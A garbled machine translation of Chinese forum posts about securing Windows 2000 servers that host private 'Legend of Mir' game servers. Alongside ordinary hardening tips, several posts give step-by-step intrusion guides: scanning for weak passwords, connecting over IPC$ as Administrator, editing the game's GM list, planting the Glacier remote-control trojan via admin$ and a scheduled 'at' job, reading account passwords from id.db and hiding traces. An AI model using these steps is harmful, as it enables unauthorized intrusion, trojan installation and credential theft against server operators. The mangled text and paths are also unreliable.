Windows2000 contains a lot of security features and options if you are reasonably configured, then Windows 2000 will be a very secure operating system..
Primary security
Physical security
The server should be placed in the quarantine room installed, and the monitor has to keep more than 15 days of video recording. In addition, the chassis, keyboard, computer desk drawers should be locked to ensure that they cannot use computers even if they enter the room, the key is placed in additional security.
2. Stop the Guest account
The Guest account is deactivated in a computer-managed user, and the guest account login system is not allowed. For the sake of insurance, it is best to add a complex password to Guest. You can open a notepad, enter a string containing a special character, number, a long string, then copy it as a Guest account.
3. Limit unnecessary number of users
Remove all Duplicate User accounts, test accounts, share accounts, ordinary department accounts, etc. User Group Policy Sets the appropriate permissions, and often check the system's account, delete the account that is not in use. These accounts are many of the breakthroughs of hackers intrusion system, the more system accounts, and hackers have the possibility of legitimate users, and the more powerful users are generally. Domestic NT / 2000 hosts, if the system account exceeds 10, usually one or two weak password accounts. I have found that 180 accounts in the 197 accounts of a host are all weakly passwords.
4. Create 2 administrators with account
Although this is a bit contradictory, it is in fact to obey the rules of the above. Create a general permissions account to recruit and handle some * standby, another account with Administrators permission is only used when needed. Allows administrators using the "runas" command to perform some work that require privileges to make it easy to manage.
5. Remove the system administrator account
Everyone knows that Windows 2000's Administrator account cannot be deactivated, which means that others can try the password of this account over again. The Administrator account is renamed to prevent this. Of course, please do not use the name of admin, change it equal to not change, try to disguise it into ordinary users, such as change: guestone.
6. Create a trap account
What is a trap account? Look!> Create a local account called "Administrator", set its permissions to the lowest, what can't be done, and add a super complex password that exceeds 10 digits. This allows those Scripts S to be busy for a while, and they can discover their intrusion attempts. Or do a hand feet on its login scripts. Oh, enough!
7. Change the permissions of the shared file from the "Everyone" group to "Authorized User"
"Everyone" means anyone who has the right to enter your network can get these shared information. Do not set users of shared files to "Everyone" group at any time. Including printing sharing, the default attribute is "Everyone" group, must not forget to change.
8. Use the security password
A good password is very important for a network, but it is easier to ignore. The previously said may have explained this. When some company administrators create an account, they often use the company name, computer name, or some other things to make the user name, then set the password of these accounts n simple, such as "Welcome" "IloveYou" "Letmein" or the same as the username. Such an account should be required to change to a complex password when the user is first logged in, and also pay attention to changes in the password. When I discussed this problem before IRC, we gave a good password to a definition: the password that could not be broken during the security period is a good password, that is, if people get your password document, you must spend 43 days or longer can be broken, and your password strategy must change your password in 42 days. 9. Set the screen protection password
It is also very simple and necessary. Setting the screen protection password is also a barrier to prevent internal staff to destroy the server. Note Do not use OpenGL and some complex screen saver, waste system resources, let him blank screen. Also, the machines used by all system users are also best coupled with the screen protection password.
10. Use NTFS format partition
Change all partitions of the server into NTFS format. The NTFS file system is much more secure than FAT and FAT32 file system. This doesn't have to say more, I want everyone to get the server is already NTFS.
11. Running anti-drug software
I have never seen the installation of anti-virus software, in fact, this is very important. Some good anti-virus software can not only kill some famous viruses, but also kill a large number of Trojans and backdoor programs. In this case, the famous Trojans used by the "hacker" are unused. Don't forget to upgrade the virus library
12. Safeguard the safety of the backup disk
Once the system is destroyed, the backup disk will be the only way you recover your information. After backing up the data, the backup disk is in safe place. Don't put your data on the same server, that's not as good as you want to back up.
Intermediate security articles:
1. Use the WIN2000 security configuration tool to configure the policy
Microsoft provides a set of MMC (Management Console) Security Configuration and Analysis Tools, using them, you can configure your servers to meet your requirements. For details, please refer to the Microsoft Homepage:
http://www.microsoft.com/windows200...y/sctoolset.asp
2. Close unnecessary service
Windows 2000 Terminal Services (Terminal Services), IIS, and RAS may bring security vulnerabilities to your system. In order to be able to manage the server remotely, many machine terminal services are open, if you open, to confirm that you have configured the terminal service. Some malicious programs can also run quietly in service. To pay attention to all services on the server, check them in medium-term (every day). Below is the default service for the C2 level installation:
Computer Browser Service TCP / IP NetBIOS Helper
Microsoft DNS Server SpoOler
NTLM SSP Server
RPC Locator Wins
RPC Service Workstation
Netlogon Event Log
3. Close unnecessary port
Turning off port means reducing functionality, you need to make a decision on security and feature. If the server is installed behind the firewall, the risk will be less, but never think that you can have no worries. Use the port scanner to scan the ports open, determine which services open is the first step in the hacker invading your system. The comparison table with well-known ports and services in the / SYSTEM32 / DRIVERS / ETC / Services file is available for reference. Specific method: Online Neighbor> Properties> Local Connections> Properties> Internet Protocol (TCP / IP)> Properties> Advanced> Options> TCP / IP Filter> Properties Open TCP / IP Filter, add required TCP, UDP, protocol .
4. Open a review policy
Turning on the security audit is the most basic intrusion detection method of Win2000. When someone tries to perform some ways to your system (such as trying the user password, changing account policies, unlicensed file access), it will be recorded by the security audit. Many administrators do not know in the system for a few months until the system is destroyed. The following reviews must be turned on, and others can increase as needed:
Policy settings
Review system login event success, failed
Review account management success, failed
Review the success of the login event, failed
Audit object access success
Review strategy changes success, failed
The privilege is successful, failed
The audit system event succeeded, failed
[NextPage]
5. Turn on the password password policy
Policy settings
Password complexity requirements are enabled
Password length minimum 6 bit
Forced password history 5 times
Forced password history 42 days
6. Open account strategy
Policy settings
Reset account lock counter 20 minutes
Account lock time 20 minutes
Account lock threshold 3 times
7. Set access to security records
Safety records are not protected by default, set him to only Administrator and system accounts to access.
8. Store sensitive files in additional file servers
Although the hard disk capacity of the server is now large, you should also consider whether it is necessary to store some important user data (files, data sheets, project files, etc.) in another secure server and often back up them.
9. Do not let the system show the username last login
By default, when the terminal service is connected to the server, the last login account will be displayed in the login dialog, and the local login dialog is the same. This makes someone else to get some user names of the system, and then give a password speculation. Modifying the registry can not let the dialog box to display the last login username, the specific:
HKLM / Software / Microsoft / Windows NT / CurrentVersion / Winlogon / DONTDISPLAYLASTUSERNAME
Change the key value of REG_SZ to 1.
10. It is forbidden to establish an empty connection
By default, any user enumerates an account by empty connection, and speculates the password. We can ban the establishment of an empty connection by modifying the registry:
The value of local_machine / system / currentcontrolset / control / lsa-restrictanonymous is changed to "1".
10. Download the latest patches to Microsoft Website
Many network administrators have no habit of accessing the security site, so that some vulnerabilities have been out of time, and the vulnerability of the server is not replenished by the target. No one dares to guarantee that millions of rows of code 2000 do not have a safe vulnerability, often access Microsoft and some security sites, download the latest service packs and vulnerability patches, is the only way to ensure long-term security of the server.
Advanced articles:
1. Turn off DirectDraw
This is the requirements for C2 level safety standards to video cards and memory. Turning off DirectDraw may have an impact on some programs that need to use DirectX (such as games, playing star hegemony on the server. I am dizzy .. $% $ ^% ^ & ??), but for the vast majority of business sites should be There is no effect. Modify the registry HKLM / System / CurrentControlSet / Control / GraphicsDrivers / DCI's Timeout (REG_DWORD) is 0. 2. Close the default sharing
After win2000 is installed, you can create some hidden shares, you can check them in CMD. There are a lot of articles on IPC intrusion on the Internet, I believe that everyone must be unfamiliar with it. To prohibit these sharing, open administrative tools> Computer Management> Shared Folders> Share Press the right button on the appropriate shared folder, point to stop sharing, but the machine will be restarted, these shares will be reopened again.
Default shared directory path and function
C $ D $ E $ E $ Each partition root directory. Win2000 Pro version, only Administrator
And the BACKUP OPERATORS group can be connected, Win2000 Server version
The Server OperatROS group can also be connected to these shared directories
Admin $% SYSTEMROOT% Remote Management Shared Directory. Its path is always
Point to Win2000 installation path, such as C: / Winnt
FAX $ In Win2000 Server, Fax $ will arrive when Fax client is sent.
IPC $ empty. IPC $ sharing provides the ability to log in to the system.
Netlogon This shared NET Login service in Windows 2000 server is at
Used when the login domain request
Print $% SystemRoot% / System32 / Spool / Drivers User remote management printer
Solution:
Open the Registry Editor. Regedit
HKEY_LOCAL_MACHINE / SYSTEM / CURRENTCONTROLSET / SERVICES / LANMANSERVER / PARAMETERS
Create a DWORD button called AutoShareserver on the right. Value 0
[NextPage]
3. Prohibit Dump File production
Dump file is a very useful lookup problem when the system crashes and blue screen (otherwise I will translate into garbage files on the literal "). However, it can also provide some sensitive information such as a password such as some applications. To prohibit it, open Control Panel> System Properties> Advanced> Startup and Fault Recovery Change the write debugging information to not. When you use it, you can reopen it again.
4. Using the file encryption system EFS
Windows2000 powerful encryption system can add a level of security to disk, folder, file. This prevents others from hanging your hard drive to other machines to read the data inside. Remember to use EFS to the folder, not just a single file. Specific information about EFS can be viewed
http://www.microsoft.com/windows200...ity/encrypt.asp
5. Encryption TEMP folder
Some applications are installing and upgraded, some things will be copied to the Temp folder, but when the program is upgraded or closed, they do not clear the contents of the Temp folder. So, encrypting the TEMP folder can be protected for your file.
6. Slide the registry
In Windows2000, only Administrators and Backup Operators have access to the registry from the network. If you think is not enough, you can further set the registry access, please refer to:
Http://support.microsoft.com/suppor...s/q153/1/83.asp7. Clear the page file when shutdown
The page file is also a scheduling file, which is a hidden file that Win2000 is used to store the program and data file section of the memory. Some third-party programs can exist in memory in some memory, and some sensitive information may also be included in the page file. To clear the page file when shutdown, you can edit the registry
HKLM / System / CurrentControlSet / Control / Session Manager / Memory Management
Set the value of ClearPageFileatShutdown to 1.
8. Prohibit starting from floppy disk and CD ROM
Some third-party tools can bypass the original security mechanism by booting the system. If your server is very high for security requirements, you can consider using a mobile floppy disk and optical drive. Lock the chassis and throw it a good way.
9. Consider using smart card to replace the password
For passwords, it always causes the security administrator to refund two difficulties, which is easy to attack 10PHTCRACK and other tools. If the password is too complicated, the user will write a password everywhere in order to remember the password. If the conditions are allowed, it is a good solution to complex passwords with smart cards.
10. Consider using IPSec
As its name, IPSec provides security of IP packets. IPSec provides authentication, integrity, and selectable confidentiality. The sender computer encrypts data before transfer, and the receiver computer decrypts data after receiving the data. Using IPSec can make the system's security performance greatly enhanced.
SF must open port, extremely solving port security
SF must open port, extremely solving port security
Author: krish
Legendary server open port peanut shell some must port
You can use TCP / IP filtering, only open these ports to increase security, (open other services, join yourself again)
TCP / IP Filter Port -> TCP Fracture
Port 7220 .... Rungate 1 port
Port 7210 .... Rungate 2 port 3 Rungate at the same time
Port 7200 .... RUNGATE 3 port
Port 7100
Port 7012
Port 6000
Port 5600
Port 5500
Port 5100
Port 5000
Port 4900
Port 3389
Port 3372
Port 3100
Port 3000
Port 1027
Port 1025
Port 0135
The comparison table with well-known ports and services in the / SYSTEM32 / DRIVERS / ETC / Services file is available for reference. The specific method is:
Online Neighbor> Properties> Local Connections> Properties> Internet Protocol (TCP / IP)> Properties> Advanced> Options> TCP / IP Filter> Properties Open TCP / IP filter, add required TCP, protocol.
I opened three Rungate ports, solving multiple players while logging in to access, and the server suddenly scattered, and the three effects were better. Yes * (GGGG7 original)
Method for opening 3 RUNGATE ports:
The Rungate folder replicates 2 parts of Rungate1, Rungate2, Rungate3, which will be changed to Gateport = 7200, Gateport = 7210, Gateport = 7220, respect
Under the DBSRV200 folder! ServerInfo.txt is changed to 127.0.0.1 127.0.0.1 7200 127.0.0.1 7210 127.0.0.1 7220
Mir200 folder below! Servertable.txt change
1 127.0.0.1 7200
2 127.0.0.1 7210
3 127.0.0.1 7220
Then running the 3 Rungate.exe under Rungate1, Rungate2, Rungate3
M2Server will prompt:
Gate 0 OPENED
Gate 1 Opened
Gate 2 Opened
Appropriate plus point firewall will be better
The attack and defense of private service
I advocate private service technology! Enthusiasm! To work together to create a good game atmosphere!
A few *, this private service also suffered a hacker attack! However, it has been studied several times to discover the vulnerability!
Below I write how to invade the computer, I use Windows 2000 Sever
1 X-SCAN scan IP to see who is a weak password (IP is also very easy to get, private service, weak password is the user name and password is the system default, no change.)
2 Open the DOS system under DOS!
C: /> NET Use //192.168.0.1/IPC / User: Administrator Enter the other party computer user enters the administrator user.
After entering, it will be done, you can find you black private service! Do GM, it is good to destroy and delete, such as do GM!
C: /> Copy //192.168.0.1/d $/mirserver/mir200/envir/adminList.txt is a command, you can see, the rest, how to change, but I have to explain! ! This code is very simple, copy the D disk, a list of legendary GM, you can add yourself to go in editing!
C: /> Edit //192.168.0.1/d $ berirsterver/mir200/envir/adminList.txt
that's it. This is a method of using a weak pass to enter a computer! ! Of course, there are more methods.
I am talking about the black experience of my ** legend!
First of all, it is the mouse to move, it is obvious that it is controlled, the analysis is as follows: 1, Zhongmu, 2 remote control!
Secondly, there is a dialog box covered, the computer is suddenly restarted! ! The analysis is as follows: 1, destroy the system, 2, control over the legend! 3, from the new start to take effect for the hackers!
Again, there is an illegal GM manufacturing item to be isolated. The analysis is as follows: it is for the legend!
Solution: Use anti-virus software to anticore, it is best to do it under DOS! 2, there are too many vulnerabilities in 2000, look up the useless port, close 3389, etc., download 2000 SP3 patch! Check the guest user and group in the control panel! And IUSR (computer name) Intnernet guest account is turned off (my legend is hacker to use this number to enter the computer), modify the super administrator username and password! In the close of the remote access, the offense legend is mainly the list of GM. I also pass, the phenomenon is like this, open the adminlist.txt file, did not find more GM, using Ctrl-a to see if there is no extra GM , In addition, look at it, there is no space after watching the file name of adminlist.txt, the settings file is displayed, and it will find that there is more hidden GM list file, which is the reason for the discovery of illegal GM. Hacking attack My computer was founded for 2 hours, I was discovered, I immediately made a corresponding modification, restored the legendary normal operation, so far, someone still entered my guest account warning, but it hasn't come! Legend has also entered normal running! Although I wrote some methods and solutions to the computer, I feel a little contradictory idea, but my purpose is very simple, I hope to help you solve your problem! Improve your own computer security
[NextPage]
Some sf has a true cause of illegal GM ~
Repost
Some sf has a true cause of illegal GM ~
Here is how to do illegal GMs without being expressed in the GM file, nor the problem of behind the door, please see the repost, I hope everyone is strictly prepared ~
How to do GM ????
Attack primary teaching
I am using the method used by others 4F
Seeing some 4F is doing well, but in turn is not very rich, no equipment, the master is also a lot, I have never like me in the rookie, and I have a lot of trouble to enter their server. Foot enough to add addiction, now I publish the method and everyone. . . .
In fact, the method I use is very simple, only 4 tools:
(1): SHED.EXE
(2) Flower 2000
(3) cmd.exe (in fact, DOS below 2000)!
(4) Ice 8.4 operating system: Win2000 Server or WinXP system. "SHED.EXE": It is actually used to check the shared resources, fast, you can find a lot of service-breaking copies, but some IPs are not accessible in the browser, because it also contains Personal Internet IP. Ha ha! Some of the websites of the website, Internet cafes are shared, some are accessible, but they can't delete, because you have access to anonymous access, so the permissions are not enough! Some need password. What should I do if I encounter my password? With stream! Although "stream" is limited to 202, it is not limited to the IP of small Japan, huh, huh! So use the IPC detection of the streamer, create an empty dialogue, find the list of users, and then simply detect, some network management is lazy, put the Administrator set too simple, huh, you can catch it. How do you do next step? Maybe when you check the other party's port, I found that the port of the other party is very small, such as FTP is not open, what should I do? Ice! "Ice", I want to have many friends to play, using the ice river to control a server speed, (because the bandwidth is wide) a few minutes to find the homepage of the other host. But how to upload and control him? "Cmd.exe" is DOS under 2000, performs cmd.exe using the net command,
The specific operation is as follows:
The first step: NET USE // IP / IPC $ "Password" / user: "user" Description: Establish a join with your favorite website with a super user name, and of course the super user must be in the site admin. The "IP" here is the host, "password" is the superuser password, "User" is a super user. For example: Net use //210.248.250.2/IPC $ "maozhiie" / user: maozhijie
Step 2: Copy G-Server.exe // IP / Admin $ / SYSTEM32 Description: g-server.exe is the remote server side of the Ice. Significance: Copy this file to the system32 directory in the Host WinNT of the other party. Maybe someone wants to ask Trojans to be observed, huh, huh! Installed the firewall estimation, but many hosts have no money to buy! Unlike Chinese piracy! If you have the latest Trojans! This is the best! !嘿 ...
Step 3: NET TIME // IP looks at the other party's server time. Because there is a time difference, it should be an hour! Therefore, you must be based on the other party's server time.
Step 4: AT // ip time g-server.exe The TIME here is the other party's host time. Role: Execute the program at a specified time. For example, at //210.248.250.2 19:55 g-server.exe fifth step: the ice river can control the computer. I don't say this, huh, huh! The software that rookie will also play.
At this time we can control the server,
NET USE * // ip / * $ Remote Mapping
look at this
There is some data of everyone in mir.db, and you can use it.
Access finds to change, change a few best, such as 0-80 attack wood sword, 0-50 magic's hex rings, then you will. It's just that it is too annoying. Ha ha. For example, weapons, data formats are as follows (all 16)
** ** ** ** CE 00 43 12 88 13 01 02 03 04 05 06 07 08 09 00 00 0A
The front ** is the item code, then the 0xCE 00 is the weapon code (high in post), and the item DB database corresponds.
Example: The Dragon Slayer is the serial number (IDX) is 205, and the corresponding is (205 1) to 16-based CE
The latter 43 12 is current lasting, 88 13 is the maximum laster.
Example: 43 12 conversion into ten into 17170, long lasting is 17
The latter 01 02 03 is an attack, magic, and Taoism.
Note that it is incremented on the basis of the original Wu.
Example: The above Dragon is shown to be an attack: 5-36, Taoji: 0-2, Magic: 0-3.
The latter 04 05 06 07 08 09 is in turn is the lucky, curse, accurate, attack speed, intensity of the weapon.
The 0x0a followed by the back of the two vacation is to indicate whether the weapon is cultivated, specifically
When adding attacks to weapons:
Before cultivating: 00
After practicing: 0A
After the test was successful: 00, the attack value increased.
For jewelery and clothes, you study it yourself, there are many people who know, I have not waited. The article in this area is there, I don't have to say more?
Then arrive, | mirserver / mud2 / logsrv / iddb
Here is an id.db owner's account and password, you look at it, but the number of stealing people is not a glorious thing. I never do it, just often take the GM number to reload. a bit. Ha ha
Here, I will see you and then add to the administ, huh, here is a bit, here, join your name), then we find the GM account in mir.db, then go to ID.db Find the password of this account. Ok, OK, use the GM number to enter the game (I will get in front of him, don't let people find it, don't change people's password, let people find more, huh). Match @reloadadmin. Immediate OUT.
Then, put the characters you join the adminlist from adminlist, okay, you go in the game, you are GM, but the real GM will not see your name from the server side! ! He may think about "What happened here? It seems to have a GM ???". Oh, but don't fire, or a Reload your permissions are gone.
When you do your GM, you will do it. Here I said is how remote control server host, such as shutting down, restarting ...
[NextPage]
I don't understand the private service technology. However, the server security is still slightly one or two!
The server invasion mainly rely on the account number and password. Everyone must understand what is the system account. What is a system password!
Other Windows Each system has his super administrator account and password!
One, these are scanned by hackers, which you will get a threat!
When your private service is very popular. If you have a hacker, if you want to delete the data. By the time. It's really miserable.
One: Learn about the meaning of the account
Run CMD first
Then enter: Net user (Enter)
This will then display an account number
View the administrator account again
Enter: Net localgroup administrators
This is the user who viewed the Administrators group. In this way, if the method of hidden accounts is also found!
The super-administrator account with the system is Administrator
Remember that there are multiple accounts that are unknown here. How to prove that your machine is not safe. If the account appears is your own account. Which one percent of your machine is not invaded
account safety:
Two: password articles
If you feel that your own account password is 123456, you can't live in three seconds.
Modify the password method, modify safer under DOS
Enter the NET USER account name to change the password (and then enter the return health)
Generally, the password is complex!
overflow:
2000 server version will automatically install IIS, if you think that IIS is not used, it will stop. IIS Address: Start "Programs" Administrative Tools "Internet Information Service (this is IIS) You will open him. Press to stop! This is further safe. However, if IIS you need, I remember to play the latest patch SP4.
RPC overflow. Everyone remembers, try Telnet IP 135 to see if there is any opening. If it is open. Please play the RPC patch. If you can't find it. Simply install a firewall, shield 135 side!
Everyone must remember. The invasion system is the most important point to the account password. Protect your account and password. Safety must belong to you!
This article causses the attention of the majority of 4F owners
Invasion of the legendary private service / act as illegal GM.
First of all, I have to declare that I don't teach you how to go to black 4F, just want to cause the majority of 4F owners to pay attention to this article.
Improve your own network management level.
I love to play games, but I have a good dish, I don't have time to play, I just want to play with it, so when I start playing legendary,
Although it is fun, it is simply being guilty, the upgrade is slow, and there is no good equipment, and it is bullied everywhere. So, 4f is clear
The choice of intelligence, but there is no good equipment when I go in, and I am bullied. Don't I do GM? Try, FOLLING ME!
Look for a lot of 4F IP, open an X-Scan sweep. Yes, there is a lot, all of which are weak, these network managers.
Choose one, 192.168.0.1, go!
Open CMD,
1) C: /> NET Use 192.168.0.1ipc $ / user: administrator
connection succeeded,
OK, even, success,
2) C: /> Copy 192.168.0.1d $ mirsermir200nviradminList.txt
The system can not find the file specified.
No? impossible? Oh, it must be hidden, it doesn't matter, come back,
3) C:> attrib -r -h 192.168.0.1d $ mirsermir200nviradminList.txt
No prompt, success,
This time, the copy is not available, change it directly,
4) C:> Edit 192.168.0.1d $ mirsermir200nviradminList.txt
Will open a diamond, look at what GM inside, add one, remember it, change the save and exit 5) C:> Attrib R H 192.168.0.1d $ mirsermir200nviradminList.txt
Restore adminiList.txt into read-only hidden,
Ok, I'm big, I will sweep the footprint, don't let people find it to be invaded.
Now, wait for the system to restart, wait until the fifth step, let it restart, but this is too dangerous, or wait.
,
The next day, registered an account, and the newly added prior to the new year.
/ WHO
Current 150 people online
Ha, I am GM. Hurry and upgrade yourself,
@Lesvel -1
Upgrade success, 255, haha
Reproduce the desired equipment, want to make anything,
Repeat the above to delete yourself from adminList.txt, haha, good equipment to your hand, you can play
I remember that a friend has made a series of descriptions of strengthening the safety of the server security, and I have a very detailed, but I think there is still a lot of places that I need to add. Microsoft's system is a vulnerability and patch known, truly to serve the server. The security configuration is really very difficult, and it is too much to consider.
Today, I will talk about an aspect today, and it is also a further supplement to the front of friends!
The front of the friend is an overview of the security settings for Win2000 system weak! He has already said it is very careful, doing it, the password is almost the same. It is really important in the Internet, I A series of tests on foreign hosts, there are still many systems with weak passwords! It also includes a small and medium-sized enterprise web server, E-mail, proxy server has this low level. mistake!
If you do very careful in this regard. But you should also study what services do you have now in this manner, what do you still have? You should be very clear! Because of hacker software, Trojan tools, remote Most of the control software is run in your server system in your server system. The general firewall, anti-virus software does not reflect. For control tools in the form of service. Better discovery, so you must be on the server Which services running are very familiar. It should be safely set for unfamiliar or strange services.
Below my WIN2000 WWW (IIS) server security configuration, WWW service is installed by default in Win2000Server, Adserver, and version, if you don't need to use 2000 WWW services, it is recommended not to install. As for add / Delete You can control the panel to remove his installation, or set the Word Wide Web Service start-up type to manual / disable in Administrative Tools / Services
In this way, the system will not start the reform service by default!
If you need to use IIS to build a station to promote your own private service, you must safely configure IIS as follows.
In IIS components, you first want to remove the SMTP, SNNP, FTP you don't need, so you can reduce the CPU resource occupied by your server, and memory usage. Then I suggest you delete all your c: / interpub / directory all Content! Or change the path. Delete the default site in the IIS Manager, (or delete this virtual directory) Because this directory has permissions. In the newly built web site, set the IIS's right to make it can't Write or run. Because IIS is the default support ASP script. Then delete unwanted mappings in IIS. This is important. If you want to support PHP, CGI scripts, you have to configure PHP.cgi applications Correct mapping, disabling or deleting FSO components, (last year's window is being used to use fso black ...) If you want to use FSO, it is best to change your name! Otherwise, you provide homepage to others. If you will definitely be black. Be careful!
At present, in the hacking Internet space, use IIS's vulnerability, refer to its own permissions, and become AD, these is just a light and easy task, this does not need to spend a few days to go to violence to crack the password, like the Web server set up There is a case, it is not too much. About how to use the Unicode vulnerability to provide an article on AD permissions, there are too many online, I don't talk much.
These, it should be an example of server security prevention. I really want to do the safe operation of the server, you need to spend a lot of time to explore. Because these, it is enough to cope with some borsing ..... of course, If you need a web server, I still recommend you to use the AP. His source code development, free, safe stability is much stronger than IIS. If you still have a lot to discuss with I, you can directly I contact it. To the security problem of Linux, the problem of the AP, some anti-black drags of 2000, and anti-black, track hackers attack
